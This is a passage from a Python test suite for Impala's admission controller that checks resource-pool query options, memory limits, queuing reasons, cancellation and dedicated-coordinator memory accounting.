requested pool 'root.queueC' "\ "denied access to assigned pool 'root.queueC'" self.__check_pool_rejected(client, 'root.queueC', expected_error) # Also try setting a valid pool client.set_configuration({'request_pool': 'root.queueB'}) result = client.execute("select 1") # Query should execute in queueB which doesn't have a default mem limit set in the # llama-site.xml, so it should inherit the value from the default process query # options. self.__check_query_options(result.runtime_profile, ['MEM_LIMIT=200000000', 'REQUEST_POOL=root.queueB']) # Try setting the pool for a queue with a very low queue timeout. # queueA allows only 1 running query and has a queue timeout of 50ms, so the # second concurrent query should time out quickly. client.set_configuration({'request_pool': 'root.queueA'}) handle = client.execute_async("select sleep(1000)") self.__check_pool_rejected(client, 'root.queueA', "exceeded timeout") assert client.get_state(handle) == client.QUERY_STATES['FINISHED'] # queueA has default query options mem_limit=128m,query_timeout_s=5 self.__check_query_options(client.get_runtime_profile(handle), [queueA_mem_limit, 'QUERY_TIMEOUT_S=5', 'REQUEST_POOL=root.queueA']) client.close_query(handle) # Should be able to set query options via the set command (overriding defaults if # applicable). mem_limit overrides the pool default. abort_on_error has no # proc/pool default. client.execute("set mem_limit=31337") client.execute("set abort_on_error=1") result = client.execute("select 1") self.__check_query_options(result.runtime_profile, ['MEM_LIMIT=31337', 'ABORT_ON_ERROR=1', 'QUERY_TIMEOUT_S=5', 'REQUEST_POOL=root.queueA']) # Should be able to set query options (overriding defaults if applicable) with the # config overlay sent with the query RPC. mem_limit is a pool-level override and # max_io_buffers has no proc/pool default. 
client.set_configuration({'request_pool': 'root.queueA', 'mem_limit': '12345'}) result = client.execute("select 1") self.__check_query_options(result.runtime_profile, ['MEM_LIMIT=12345', 'QUERY_TIMEOUT_S=5', 'REQUEST_POOL=root.queueA', 'ABORT_ON_ERROR=1']) # Once options are reset to their defaults, the queue # configuration should kick back in. We'll see the # queue-configured mem_limit, and we won't see # abort on error, because it's back to being the default. client.execute('set mem_limit=""') client.execute('set abort_on_error=""') client.set_configuration({'request_pool': 'root.queueA'}) result = client.execute("select 1") self.__check_query_options(result.runtime_profile, [queueA_mem_limit, 'REQUEST_POOL=root.queueA', 'QUERY_TIMEOUT_S=5']) finally: client.close() # HS2 tests: # batch_size is set in the HS2 OpenSession() call via the requires_session() test # decorator, so that is included in all test cases below. batch_size = "BATCH_SIZE=100" # Check HS2 query in queueA gets the correct query options for the pool. self.__check_hs2_query_opts("root.queueA", None, [queueA_mem_limit, 'QUERY_TIMEOUT_S=5', 'REQUEST_POOL=root.queueA', batch_size]) # Check overriding the mem limit sent in the confOverlay with the query. self.__check_hs2_query_opts("root.queueA", '12345', ['MEM_LIMIT=12345', 'QUERY_TIMEOUT_S=5', 'REQUEST_POOL=root.queueA', batch_size]) # Check HS2 query in queueB gets the process-wide default query options self.__check_hs2_query_opts("root.queueB", None, ['MEM_LIMIT=200000000', 'REQUEST_POOL=root.queueB', batch_size]) @pytest.mark.execute_serially @CustomClusterTestSuite.with_args( impalad_args=impalad_admission_ctrl_config_args( fs_allocation_file="fair-scheduler-test2.xml", llama_site_file="llama-site-test2.xml", additional_args="-require_username"), statestored_args=_STATESTORED_ARGS) def test_require_user(self): open_session_req = TCLIService.TOpenSessionReq() open_session_req.username = "" open_session_resp = self.hs2_client.OpenSession(open_session_req) TestAdmissionController.check_response(open_session_resp) try: execute_statement_req = TCLIService.TExecuteStatementReq() execute_statement_req.sessionHandle = open_session_resp.sessionHandle execute_statement_req.statement = "select count(1) from functional.alltypes" execute_statement_resp = self.hs2_client.ExecuteStatement(execute_statement_req) self.wait_for_operation_state(execute_statement_resp.operationHandle, TCLIService.TOperationState.ERROR_STATE) get_operation_status_resp = self.get_operation_status( execute_statement_resp.operationHandle) assert "User must be specified" in get_operation_status_resp.errorMessage finally: close_req = TCLIService.TCloseSessionReq() close_req.sessionHandle = open_session_resp.sessionHandle TestAdmissionController.check_response(self.hs2_client.CloseSession(close_req)) @pytest.mark.execute_serially @CustomClusterTestSuite.with_args( impalad_args=impalad_admission_ctrl_flags(max_requests=1, max_queued=1, pool_max_mem=10 * 1024 * 1024, proc_mem_limit=1024 * 1024 * 1024), statestored_args=_STATESTORED_ARGS) def test_trivial_coord_query_limits(self): """Tests that trivial coordinator only queries have negligible resource requirements. """ if self.exploration_strategy() != 'exhaustive': pytest.skip('runs only in exhaustive') # Queries with only constant exprs or limit 0 should be admitted. 
self.execute_query_expect_success(self.client, "select 1") self.execute_query_expect_success(self.client, "select * from functional.alltypes limit 0") non_trivial_queries = [ "select * from functional.alltypesagg limit 1", "select * from functional.alltypestiny"] for query in non_trivial_queries: ex = self.execute_query_expect_failure(self.client, query) assert re.search("Rejected query from pool default-pool: request memory needed " ".* is greater than pool max mem resources 10.00 MB \(configured " "statically\)", str(ex)) @SkipIfS3.hdfs_block_size @SkipIfABFS.hdfs_block_size @SkipIfADLS.hdfs_block_size @SkipIfEC.fix_later @pytest.mark.execute_serially @CustomClusterTestSuite.with_args( impalad_args=impalad_admission_ctrl_flags(max_requests=1, max_queued=1, pool_max_mem=40 * 1024 * 1024, proc_mem_limit=1024 * 1024 * 1024), statestored_args=_STATESTORED_ARGS) def test_memory_rejection(self, vector): """Test that rejection of queries based on reservation and estimates works as expected. The test depends on scanner memory estimates, which different on remote filesystems with different (synthetic) block sizes.""" # Test that the query will be rejected by admission control if: # a) the largest per-backend min buffer reservation is larger than the query mem limit # b) the largest per-backend min buffer reservation is larger than the # buffer_pool_limit query option # c) the cluster-wide min-buffer reservation size is larger than the pool memory # resources. self.run_test_case('QueryTest/admission-reject-min-reservation', vector) # Test that queries are rejected based on memory estimates. Set num_nodes=1 to # avoid unpredictability from scheduling on different backends. exec_options = vector.get_value('exec_option') exec_options['num_nodes'] = 1 self.run_test_case('QueryTest/admission-reject-mem-estimate', vector) # Process mem_limit used in test_mem_limit_upper_bound PROC_MEM_TEST_LIMIT = 1024 * 1024 * 1024 @pytest.mark.execute_serially @CustomClusterTestSuite.with_args( impalad_args=impalad_admission_ctrl_flags(max_requests=1, max_queued=1, pool_max_mem=10 * PROC_MEM_TEST_LIMIT, proc_mem_limit=PROC_MEM_TEST_LIMIT)) def test_mem_limit_upper_bound(self, vector): """ Test to ensure that a query is admitted if the requested memory is equal to the process mem limit""" query = "select * from functional.alltypesagg limit 1" exec_options = vector.get_value('exec_option') # Setting requested memory equal to process memory limit exec_options['mem_limit'] = self.PROC_MEM_TEST_LIMIT self.execute_query_expect_success(self.client, query, exec_options) @pytest.mark.execute_serially @CustomClusterTestSuite.with_args( impalad_args=impalad_admission_ctrl_flags(max_requests=1, max_queued=1, pool_max_mem=10 * PROC_MEM_TEST_LIMIT, proc_mem_limit=PROC_MEM_TEST_LIMIT), num_exclusive_coordinators=1) def test_mem_limit_dedicated_coordinator(self, vector): """Regression test for IMPALA-8469: coordinator fragment should be admitted on dedicated coordinator""" query = "select * from functional.alltypesagg limit 1" exec_options = vector.get_value('exec_option') # Test both single-node and distributed plans for num_nodes in [0, 1]: # Memory just fits in memory limits exec_options['mem_limit'] = self.PROC_MEM_TEST_LIMIT exec_options['num_nodes'] = num_nodes self.execute_query_expect_success(self.client, query, exec_options) # A bit too much memory to run on coordinator. 
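      # (1.1 * PROC_MEM_TEST_LIMIT is roughly 1.10 GB, just over the 1 GB available for
      # admission on the dedicated coordinator, so admission control should reject the
      # query with the message checked below.)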
exec_options['mem_limit'] = long(self.PROC_MEM_TEST_LIMIT * 1.1) ex = self.execute_query_expect_failure(self.client, query, exec_options) assert ("Rejected query from pool default-pool: request memory needed " "1.10 GB is greater than memory available for admission 1.00 GB" in str(ex)), str(ex) @SkipIfNotHdfsMinicluster.tuned_for_minicluster @pytest.mark.execute_serially @CustomClusterTestSuite.with_args( impalad_args=impalad_admission_ctrl_config_args( fs_allocation_file="mem-limit-test-fair-scheduler.xml", llama_site_file="mem-limit-test-llama-site.xml"), num_exclusive_coordinators=1, cluster_size=2) def test_dedicated_coordinator_mem_accounting(self, vector): """Verify that when using dedicated coordinators, the memory admitted for and the mem limit applied to the query fragments running on the coordinator is different than the ones on executors.""" self.__verify_mem_accounting(vector, using_dedicated_coord_estimates=True) @SkipIfNotHdfsMinicluster.tuned_for_minicluster @pytest.mark.execute_serially @CustomClusterTestSuite.with_args( impalad_args=impalad_admission_ctrl_config_args( fs_allocation_file="mem-limit-test-fair-scheduler.xml", llama_site_file="mem-limit-test-llama-site.xml") + " -use_dedicated_coordinator_estimates false", num_exclusive_coordinators=1, cluster_size=2) def test_dedicated_coordinator_legacy_mem_accounting(self, vector): """Verify that when using dedicated coordinators with specialized dedicated coord estimates turned off using a hidden startup param, the memory admitted for and the mem limit applied to the query fragments running on the coordinator is the same (as expected from legacy behavior).""" self.__verify_mem_accounting(vector, using_dedicated_coord_estimates=False) @SkipIfNotHdfsMinicluster.tuned_for_minicluster @pytest.mark.execute_serially @CustomClusterTestSuite.with_args( impalad_args=impalad_admission_ctrl_config_args( fs_allocation_file="mem-limit-test-fair-scheduler.xml", llama_site_file="mem-limit-test-llama-site.xml"), num_exclusive_coordinators=1, cluster_size=2) def test_sanity_checks_dedicated_coordinator(self, vector, unique_database): """Sanity tests for verifying targeted dedicated coordinator memory estimations and behavior.""" self.client.set_configuration_option('request_pool', "root.regularPool") ImpalaTestSuite.change_database(self.client, vector.get_value('table_format')) exec_options = vector.get_value('exec_option') # Make sure query option MAX_MEM_ESTIMATE_FOR_ADMISSION is enforced on the dedicated # coord estimates. Without this query option the estimate would be > 100MB. expected_mem = 60 * (1 << 20) # 60MB exec_options['MAX_MEM_ESTIMATE_FOR_ADMISSION'] = expected_mem self.client.set_configuration(exec_options) handle = self.client.execute_async(QUERY.format(1)) self.client.wait_for_finished_timeout(handle, 1000) mem_to_admit = self.__get_mem_limits_admission_debug_page() assert abs(mem_to_admit['coordinator'] - expected_mem) < 0.0001,\ "mem_to_admit:" + str(mem_to_admit) assert abs(mem_to_admit['executor'] - expected_mem) < 0.0001, \ "mem_to_admit:" + str(mem_to_admit) self.client.close_query(handle) # If the query is only scheduled on the coordinator then the mem to admit on executor # should be zero. 
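    # (Setting NUM_NODES=1 below should force a single-node plan that runs entirely on
    # the coordinator, so no memory should be admitted on the executor.)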
exec_options['NUM_NODES'] = 1 self.client.set_configuration(exec_options) handle = self.client.execute_async(QUERY.format(1)) self.client.wait_for_finished_timeout(handle, 1000) mem_to_admit = self.__get_mem_limits_admission_debug_page() assert abs(mem_to_admit['coordinator'] - expected_mem) < 0.0001, \ "mem_to_admit:" + str(mem_to_admit) assert abs(mem_to_admit['executor'] - 0) < 0.0001, \ "mem_to_admit:" + str(mem_to_admit) self.client.close_query(handle) # Make sure query execution works perfectly for a query that does not have any # fragments schdeuled on the coordinator, but has runtime-filters that need to be # aggregated at the coordinator. exec_options = vector.get_value('exec_option') exec_options['RUNTIME_FILTER_WAIT_TIME_MS'] = 30000 query = """CREATE TABLE {0}.temp_tbl AS SELECT STRAIGHT_JOIN o_orderkey FROM tpch_parquet.lineitem INNER JOIN [SHUFFLE] tpch_parquet.orders ON o_orderkey = l_orderkey GROUP BY 1""".format(unique_database) result = self.execute_query_expect_success(self.client, query, exec_options) assert "Runtime filters: All filters arrived" in result.runtime_profile def __verify_mem_accounting(self, vector, using_dedicated_coord_estimates): """Helper method used by test_dedicated_coordinator_*_mem_accounting that verifies the actual vs expected values for mem admitted and mem limit for both coord and executor. Also verifies that those memory values are different if 'using_dedicated_coord_estimates' is true.""" self.client.set_configuration_option('request_pool', "root.regularPool") ImpalaTestSuite.change_database(self.client, vector.get_value('table_format')) handle = self.client.execute_async(QUERY.format(1)) self.client.wait_for_finished_timeout(handle, 1000) expected_mem_limits = self.__get_mem_limits_admission_debug_page() actual_mem_limits = self.__get_mem_limits_memz_debug_page(handle.get_handle().id) mem_admitted = get_mem_admitted_backends_debug_page(self.cluster) debug_string = " expected_mem_limits:" + str( expected_mem_limits) + " actual_mem_limits:" + str( actual_mem_limits) + " mem_admitted:" + str(mem_admitted) MB = 1 << 20 # Easiest way to check float in-equality. assert abs(expected_mem_limits['coordinator'] - expected_mem_limits[ 'executor']) > 0.0001 or not using_dedicated_coord_estimates, debug_string # There may be some rounding errors so keep a margin of 5MB when verifying assert abs(actual_mem_limits['coordinator'] - expected_mem_limits[ 'coordinator']) < 5 * MB, debug_string assert abs(actual_mem_limits['executor'] - expected_mem_limits[ 'executor']) < 5 * MB, debug_string assert abs(mem_admitted['coordinator'] - expected_mem_limits[ 'coordinator']) < 5 * MB, debug_string assert abs( mem_admitted['executor'][0] - expected_mem_limits['executor']) < 5 * MB, \ debug_string def __get_mem_limits_admission_debug_page(self): """Helper method assumes a 2 node cluster using a dedicated coordinator. Returns the mem_limit calculated by the admission controller from the impala admission debug page of the coordinator impala daemon. Returns a dictionary with the keys 'coordinator' and 'executor' and their respective mem values in bytes.""" # Based on how the cluster is setup, the first impalad in the cluster is the # coordinator. 
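    # The admission debug page is expected to expose (roughly) this JSON shape, which
    # the code below navigates:
    #   {"resource_pools": [{"running_queries": [{"coord_mem_to_admit": ...,
    #                                             "mem_limit": ...}]}]}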
response_json = self.cluster.impalads[0].service.get_debug_webpage_json("admission") assert 'resource_pools' in response_json assert len(response_json['resource_pools']) == 1 assert response_json['resource_pools'][0]['running_queries'] assert len(response_json['resource_pools'][0]['running_queries']) == 1 query_info = response_json['resource_pools'][0]['running_queries'][0] return {'coordinator': float(query_info["coord_mem_to_admit"]), 'executor': float(query_info["mem_limit"])} def __get_mem_limits_memz_debug_page(self, query_id): """Helper method assumes a 2 node cluster using a dedicated coordinator. Returns the mem limits enforced on the query (identified by the 'query_id') extracted from mem-tracker's output on the memz debug page of the dedicated coordinator and the executor impala daemons. Returns a dictionary with the keys 'coordinator' and 'executor' and their respective mem values in bytes.""" metric_name = "Query({0})".format(query_id) # Based on how the cluster is setup, the first impalad in the cluster is the # coordinator. mem_trackers = [MemUsageVerifier(i.service).get_mem_usage_values(metric_name) for i in self.cluster.impalads] return {'coordinator': float(mem_trackers[0]['limit']), 'executor': float(mem_trackers[1]['limit'])} @SkipIfNotHdfsMinicluster.tuned_for_minicluster @pytest.mark.execute_serially @CustomClusterTestSuite.with_args(num_exclusive_coordinators=1) def test_dedicated_coordinator_planner_estimates(self, vector, unique_database): """Planner tests to add coverage for coordinator estimates when using dedicated coordinators. Also includes coverage for verifying cluster memory admitted.""" vector_copy = copy(vector) exec_options = vector.get_value('exec_option') # Remove num_nodes from the options to allow test case runner to set it in one of # the test cases. del exec_options['num_nodes'] exec_options['num_scanner_threads'] = 1 # To make estimates consistently reproducible self.run_test_case('QueryTest/dedicated-coord-mem-estimates', vector_copy, unique_database) @pytest.mark.execute_serially @CustomClusterTestSuite.with_args( impalad_args=impalad_admission_ctrl_flags(max_requests=2, max_queued=1, pool_max_mem=10 * PROC_MEM_TEST_LIMIT, queue_wait_timeout_ms=2 * STATESTORE_RPC_FREQUENCY_MS), start_args="--per_impalad_args=-mem_limit=3G;-mem_limit=3G;-mem_limit=2G", statestored_args=_STATESTORED_ARGS) def test_heterogeneous_proc_mem_limit(self, vector): """ Test to ensure that the admission controller takes into account the actual proc mem limits of each impalad. Starts a cluster where the last impalad has a smaller proc mem limit than other impalads and runs queries where admission/rejection decision depends on the coordinator knowing the other impalad's mem limits. The queue_wait_timeout_ms has been set to be more than the prioritized statestore update time, so that the queries don't time out before receiving updates to pool stats""" # Choose a query that runs on all 3 backends. query = "select * from functional.alltypesagg, (select 1) B limit 1" # Successfully run a query with mem limit equal to the lowest process memory among # impalads exec_options = copy(vector.get_value('exec_option')) exec_options['mem_limit'] = "2G" self.execute_query_expect_success(self.client, query, exec_options) # Test that a query scheduled to run on a single node and submitted to the impalad # with higher proc mem limit succeeds. 
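    # (The per-impalad process limits set above are 3G, 3G and 2G, so a 3G mem_limit
    # should only fit when the query is restricted to a single 3G node; a distributed
    # 3G query should be rejected because of the 2G impalad, which is checked next.)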
    exec_options = copy(vector.get_value('exec_option'))
    exec_options['mem_limit'] = "3G"
    exec_options['num_nodes'] = "1"
    self.execute_query_expect_success(self.client, query, exec_options)
    # Exercise rejection checks in admission controller.
    try:
      exec_options = copy(vector.get_value('exec_option'))
      exec_options['mem_limit'] = "3G"
      self.execute_query(query, exec_options)
    except ImpalaBeeswaxException as e:
      assert re.search("Rejected query from pool \S+: request memory needed 3.00 GB"
          " is greater than memory available for admission 2.00 GB of \S+", str(e)), \
          str(e)
    # Exercise queuing checks in admission controller.
    impalad_with_2g_mem = None
    try:
      # Wait for previous queries to finish to avoid flakiness.
      for impalad in self.cluster.impalads:
        impalad.service.wait_for_metric_value("impala-server.num-fragments-in-flight", 0)
      impalad_with_2g_mem = self.cluster.impalads[2].service.create_beeswax_client()
      impalad_with_2g_mem.set_configuration_option('mem_limit', '1G')
      impalad_with_2g_mem.execute_async("select sleep(1000)")
      # Wait for statestore update to update the mem admitted in each node.
      sleep(STATESTORE_RPC_FREQUENCY_MS / 1000)
      exec_options = copy(vector.get_value('exec_option'))
      exec_options['mem_limit'] = "2G"
      # Since queuing is synchronous and we can't close the previous query till this
      # returns, we wait for this to time out instead.
      self.execute_query(query, exec_options)
    except ImpalaBeeswaxException as e:
      assert re.search("Queued reason: Not enough memory available on host \S+.Needed "
          "2.00 GB but only 1.00 GB out of 2.00 GB was available.", str(e)), str(e)
    finally:
      if impalad_with_2g_mem is not None:
        impalad_with_2g_mem.close()

  @pytest.mark.execute_serially
  @CustomClusterTestSuite.with_args(
      impalad_args="--logbuflevel=-1 " + impalad_admission_ctrl_flags(max_requests=1,
        max_queued=1, pool_max_mem=PROC_MEM_TEST_LIMIT),
      statestored_args=_STATESTORED_ARGS)
  def test_cancellation(self):
    """Test to confirm that all async cancellation windows are hit and that the query
    can be successfully cancelled in each of them."""
    impalad = self.cluster.impalads[0]
    client = impalad.service.create_beeswax_client()
    try:
      client.set_configuration_option("debug_action", "CRS_BEFORE_ADMISSION:SLEEP@2000")
      client.set_configuration_option("mem_limit", self.PROC_MEM_TEST_LIMIT + 1)
      handle = client.execute_async("select 1")
      sleep(1)
      client.close_query(handle)
      self.assert_impalad_log_contains('INFO',
        "Ready to be Rejected but already cancelled, query id=")
      client.clear_configuration()
      client.set_configuration_option("debug_action", "CRS_BEFORE_ADMISSION:SLEEP@2000")
      handle = client.execute_async("select 2")
      sleep(1)
      client.close_query(handle)
      self.assert_impalad_log_contains('INFO',
        "Ready to be Admitted immediately but already cancelled, query id=")
      client.set_configuration_option("debug_action", "CRS_BEFORE_COORD_STARTS:SLEEP@2000")
      handle = client.execute_async("select 3")
      sleep(1)
      client.close_query(handle)
      self.assert_impalad_log_contains('INFO',
        "Cancelled right after starting the coordinator query id=")
      client.set_configuration_option("debug_action", "CRS_AFTER_COORD_STARTS:SLEEP@2000")
      handle = client.execute_async("select 4")
      sleep(1)
      client.close_query(handle)
      self.assert_impalad_log_contains('INFO',
        "Cancelled right after starting the coordinator query id=", 2)
      client.clear_configuration()
      handle = client.execute_async("select sleep(10000)")
      client.set_configuration_option("debug_action",
        "AC_AFTER_ADMISSION_OUTCOME:SLEEP@2000")
      queued_query_handle = client.execute_async("select 5")
      sleep(1)
      assert client.get_state(queued_query_handle) == 
QueryState.COMPILED
      assert "Admission result: Queued" in client.get_runtime_profile(queued_query_handle)
      # Only cancel (rather than close) the queued query here: close would block until
      # the query unregisters. Cancelling first lets us close the running query, which
      # gives the dequeue thread a chance to dequeue the cancelled queued query.
      client.cancel(queued_query_handle)
      client.close_query(handle)
      client.close_query(queued_query_handle)
      queued_profile = client.get_runtime_profile(queued_query_handle)
      assert "Admission result: Cancelled (queued)" in queued_profile
      self.assert_impalad_log_contains('INFO', "Dequeued cancelled query=")
      client.clear_configuration()
      handle = client.execute_async("select sleep(10000)")
      queued_query_handle = client.execute_async("select 6")
      sleep(1)
      assert client.get_state(queued_query_handle) == QueryState.COMPILED
      assert "Admission result: Queued" in client.get_runtime_profile(queued_query_handle)
      client.close_query(queued_query_handle)
      client.close_query(handle)
      queued_profile = client.get_runtime_profile(queued_query_handle)
      assert "Admission result: Cancelled (queued)" in queued_profile
      for i in self.cluster.impalads:
        i.service.wait_for_metric_value("impala-server.num-fragments-in-flight", 0)
      assert self.cluster.impalads[0].service.get_metric_value(
          "admission-controller.agg-num-running.default-pool") == 0
      assert self.cluster.impalads[0].service.get_metric_value(
          "admission-controller.total-admitted.default-pool") == 4
      assert self.cluster.impalads[0].service.get_metric_value(
          "admission-controller.total-queued.default-pool") == 2
    finally:
      client.close()

  @pytest.mark.execute_serially
  @CustomClusterTestSuite.with_args(
      impalad_args=impalad_admission_ctrl_flags(max_requests=1, max_queued=10,
        pool_max_mem=1024 * 1024 * 1024),
      statestored_args=_STATESTORED_ARGS)
  def test_queue_reasons_num_queries(self):
    """Test that queue details appear in the profile when queued based on num_queries."""
    # Run a bunch of queries - one should get admitted immediately, the rest should
    # be dequeued one-by-one.
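    # With max_requests=1 and NUM_QUERIES=5, the expected breakdown checked below is:
    # 1 query admitted immediately and 4 queued; of the queued ones, 1 should report
    # "number of running queries 1 is at or over limit 1" and the other 3 should report
    # that the queue is not empty.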
STMT = "select sleep(1000)" TIMEOUT_S = 60 EXPECTED_REASON = \ "Latest admission queue reason: number of running queries 1 is at or over limit 1" NUM_QUERIES = 5 profiles = self._execute_and_collect_profiles([STMT for i in xrange(NUM_QUERIES)], TIMEOUT_S) num_reasons = len([profile for profile in profiles if EXPECTED_REASON in profile]) assert num_reasons == NUM_QUERIES - 1, \ "All queries except first should have been queued: " + '\n===\n'.join(profiles) init_queue_reasons = self.__extract_init_queue_reasons(profiles) assert len(init_queue_reasons) == NUM_QUERIES - 1, \ "All queries except first should have been queued: " + '\n===\n'.join(profiles) over_limit_details = [detail for detail in init_queue_reasons if 'number of running queries' in detail] assert len(over_limit_details) == 1, \ "One query initially queued because of num_queries: " + '\n===\n'.join(profiles) queue_not_empty_details = [detail for detail in init_queue_reasons if 'queue is not empty' in detail] assert len(queue_not_empty_details) == NUM_QUERIES - 2, \ "Others queued because of non-empty queue: " + '\n===\n'.join(profiles) @pytest.mark.execute_serially @CustomClusterTestSuite.with_args( impalad_args=impalad_admission_ctrl_flags(max_requests=10, max_queued=10, pool_max_mem=10 * 1024 * 1024), statestored_args=_STATESTORED_ARGS) def test_queue_reasons_memory(self): """Test that queue details appear in the profile when queued based on memory.""" # Run a bunch of queries with mem_limit set so that only one can be admitted at a # time- one should get admitted immediately, the rest should be dequeued one-by-one. STMT = "select sleep(100)" TIMEOUT_S = 60 EXPECTED_REASON = "Latest admission queue reason: Not enough aggregate memory " +\ "available in pool default-pool with max mem resources 10.00 MB (configured " \ "statically). Needed 9.00 MB but only 1.00 MB was available." 
NUM_QUERIES = 5 profiles = self._execute_and_collect_profiles([STMT for i in xrange(NUM_QUERIES)], TIMEOUT_S, {'mem_limit': '9mb'}) num_reasons = len([profile for profile in profiles if EXPECTED_REASON in profile]) assert num_reasons == NUM_QUERIES - 1, \ "All queries except first should have been queued: " + '\n===\n'.join(profiles) init_queue_reasons = self.__extract_init_queue_reasons(profiles) assert len(init_queue_reasons) == NUM_QUERIES - 1, \ "All queries except first should have been queued: " + '\n===\n'.join(profiles) over_limit_details = [detail for detail in init_queue_reasons if 'Not enough aggregate memory available' in detail] assert len(over_limit_details) == 1, \ "One query initially queued because of memory: " + '\n===\n'.join(profiles) queue_not_empty_details = [detail for detail in init_queue_reasons if 'queue is not empty' in detail] assert len(queue_not_empty_details) == NUM_QUERIES - 2, \ "Others queued because of non-empty queue: " + '\n===\n'.join(profiles) def __extract_init_queue_reasons(self, profiles): """Return a list of the 'Admission Queue details' strings found in 'profiles'""" matches = [re.search(INITIAL_QUEUE_REASON_REGEX, profile) for profile in profiles] return [match.group(0) for match in matches if match is not None] @pytest.mark.execute_serially @CustomClusterTestSuite.with_args( impalad_args=impalad_admission_ctrl_flags(max_requests=1, max_queued=10, pool_max_mem=1024 * 1024 * 1024), statestored_args=_STATESTORED_ARGS) def test_query_locations_correctness(self, vector): """Regression test for IMPALA-7516: Test to make sure query locations and in-flight queries are correct for different admission results that can affect it.""" if self.exploration_strategy() != 'exhaustive': pytest.skip('runs only in exhaustive') # Choose a query that runs on all 3 backends. query = "select * from functional.alltypesagg A, (select sleep(10000)) B limit 1" # Case 1: When a query runs succesfully. handle = self.client.execute_async(query) self.__assert_num_queries_accounted(1) self.close_query(handle) self.__assert_num_queries_accounted(0) # Case 2: When a query is queued then cancelled handle_running = self.client.execute_async(query) self.client.wait_for_admission_control(handle_running) handle_queued = self.client.execute_async(query) self.client.wait_for_admission_control(handle_queued) self.impalad_test_service.wait_for_metric_value( "admission-controller.total-queued.default-pool", 1) # Queued queries don't show up on backends self.__assert_num_queries_accounted(1, 1) # First close the queued query self.close_query(handle_queued) self.close_query(handle_running) self.__assert_num_queries_accounted(0) # Case 3: When a query gets rejected exec_options = copy(vector.get_value('exec_option')) exec_options['mem_limit'] = "1b" self.execute_query_expect_failure(self.client, query, exec_options) self.__assert_num_queries_accounted(0) def __assert_num_queries_accounted(self, num_running, num_queued=0): """Checks if the num of queries accounted by query_locations and in-flight are as expected""" # Wait for queries to start/un-register. 
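    # In-flight queries on the coordinator include both running and queued queries,
    # while the per-backend query_locations should only count the running ones, since
    # queued queries have no fragments scheduled yet.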
num_inflight = num_running + num_queued assert self.impalad_test_service.wait_for_num_in_flight_queries(num_inflight) query_locations = self.impalad_test_service.get_query_locations() for host, num_q in query_locations.items(): assert num_q == num_running, "There should be {0} running queries on either " \ "impalads: {0}".format(query_locations) @SkipIfNotHdfsMinicluster.tuned_for_minicluster @pytest.mark.execute_serially @CustomClusterTestSuite.with_args( impalad_args=impalad_admission_ctrl_config_args( fs_allocation_file="mem-limit-test-fair-scheduler.xml", llama_site_file="mem-limit-test-llama-site.xml", make_copy=True), statestored_args=_STATESTORED_ARGS) def test_pool_mem_limit_configs(self, vector): """Runs functional tests for the max/min_query_mem_limit pool config attributes""" exec_options = vector.get_value('exec_option') # Set this to the default. exec_options['exec_single_node_rows_threshold'] = 100 # Set num_nodes to 1 since its easier to see one-to-one mapping of per_host and # per_cluster values used in the test. exec_options['num_nodes'] = 1 self.run_test_case('QueryTest/admission-max-min-mem-limits', vector) @pytest.mark.execute_serially @CustomClusterTestSuite.with_args( impalad_args=impalad_admission_ctrl_config_args( fs_allocation_file="mem-limit-test-fair-scheduler.xml", llama_site_file="mem-limit-test-llama-site.xml", additional_args="-default_pool_max_requests 1", make_copy=True), statestored_args=_STATESTORED_ARGS) def test_pool_config_change_while_queued(self, vector): """Tests that the invalid checks work even if the query is queued. Makes sure that a queued query is dequeued and rejected if the config is invalid.""" pool_name = "invalidTestPool" config_str = "max-query-mem-limit" self.client.set_configuration_option('request_pool', pool_name) # Setup to queue a query. sleep_query_handle = self.client.execute_async("select sleep(10000)") self.client.wait_for_admission_control(sleep_query_handle) self.__wait_for_change_to_profile(sleep_query_handle, "Admission result: Admitted immediately") queued_query_handle = self.client.execute_async("select 2") self.__wait_for_change_to_profile(queued_query_handle, "Admission result: Queued") # Change config to be invalid. llama_site_path = os.path.join(RESOURCES_DIR, "copy-mem-limit-test-llama-site.xml") config = ResourcePoolConfig(self.cluster.impalads[0].service, llama_site_path) config.set_config_value(pool_name, config_str, 1) # Close running query so the queued one gets a chance. self.client.close_query(sleep_query_handle) # Observe that the queued query fails. self.wait_for_state(queued_query_handle, QueryState.EXCEPTION, 20), self.close_query(queued_query_handle) # Change the config back to a valid value config.set_config_value(pool_name, config_str, 0) # Now do the same thing for change to pool.max-query-mem-limit such that it can no # longer accommodate the largest min_reservation. # Setup to queue a query. sleep_query_handle = self.client.execute_async("select sleep(10000)") self.client.wait_for_admission_control(sleep_query_handle) queued_query_handle = self.client.execute_async( "select * from functional_parquet.alltypes limit 1") self.__wait_for_change_to_profile(queued_query_handle, "Admission result: Queued") # Change config to something less than the what is required to accommodate the # largest min_reservation (which in this case is 32.09 MB. config.set_config_value(pool_name, config_str, 25 * 1024 * 1024) # Close running query so the queued one gets a chance. 
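    # (With max-query-mem-limit now set to 25 MB, below the ~32 MB min reservation
    # mentioned above, the dequeued scan should be rejected rather than admitted, which
    # is what the EXCEPTION state check below verifies.)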
self.client.close_query(sleep_query_handle) # Observe that the queued query fails. self.wait_for_state(queued_query_handle, QueryState.EXCEPTION, 20), self.close_query(queued_query_handle) def __wait_for_change_to_profile(self, query_handle, search_string, timeout=20): for _ in range(timeout * 10): profile = self.client.get_runtime_profile(query_handle) if search_string in profile: return sleep(0.1) assert False, "Timed out waiting for change to profile\nSearch " \ "String: {0}\nProfile:\n{1}".format(search_string, str(profile)) @pytest.mark.execute_serially @CustomClusterTestSuite.with_args( impalad_args=impalad_admission_ctrl_flags(max_requests=1, max_queued=10, pool_max_mem=1024 * 1024 * 1024)) @needs_session() def test_queuing_status_through_query_log_and_exec_summary(self): """Test to verify that the HS2 client's GetLog() call and the ExecSummary expose the query's queuing status, that is, whether the query was queued and what was the latest queuing reason.""" # Start a long running query. long_query_resp = self.execute_statement("select sleep(10000)") # Ensure that the query has started executing. self.wait_for_admission_control(long_query_resp.operationHandle) # Submit another query. queued_query_resp = self.execute_statement("select 1") # Wait until the query is queued. self.wait_for_operation_state(queued_query_resp.operationHandle, TCLIService.TOperationState.PENDING_STATE) # Check whether the query log message correctly exposes the queuing status. get_log_req = TCLIService.TGetLogReq() get_log_req.operationHandle = queued_query_resp.operationHandle log = self.hs2_client.GetLog(get_log_req).log assert "Admission result : Queued" in log, log assert "Latest admission queue reason : number of running queries 1 is at or over " "limit 1" in log, log # Now check the same for ExecSummary. summary_req = ImpalaHiveServer2Service.TGetExecSummaryReq() summary_req.operationHandle = queued_query_resp.operationHandle summary_req.sessionHandle = self.session_handle exec_summary_resp = self.hs2_client.GetExecSummary(summary_req) assert 